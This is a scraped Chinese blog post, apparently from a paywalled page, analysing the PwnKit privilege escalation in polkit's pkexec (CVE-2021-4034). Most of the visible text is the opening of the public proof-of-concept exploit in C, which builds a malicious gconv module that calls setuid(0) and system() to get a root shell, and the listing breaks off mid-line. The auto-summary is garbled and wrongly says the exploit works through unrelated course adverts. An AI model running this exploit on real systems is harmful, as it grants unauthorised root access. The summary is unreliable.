Python微信订餐小程序课程视频
https://edu.youkuaiyun.com/course/detail/36074
Python实战量化交易理财系统
https://edu.youkuaiyun.com/course/detail/35475
研究了一下前段时间的Polkit提权漏洞,里面有很多以前不知道的技巧。漏洞很好用,通杀CENTOS、UBUNTU各版本。
主要是分析这个POC触发原理。POC如下:
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
* Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
*/
#include
#include
#include
char *shell =
"#include \n"
"#include \n"
"#include \n\n"
"void gconv() {}\n"
"void gconv\_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:

本文详细分析了pwnkit漏洞(CVE-2021-4034),主要讨论如何通过改变GCONV_PATH环境变量,利用Python微信订餐小程序和量化交易系统的例子,阐述了通过execve命令执行程序并修改环境变量,最终通过g_printerr函数和编码转换实现提权,获取root shell。
最低0.47元/天 解锁文章
3187

被折叠的 条评论
为什么被折叠?



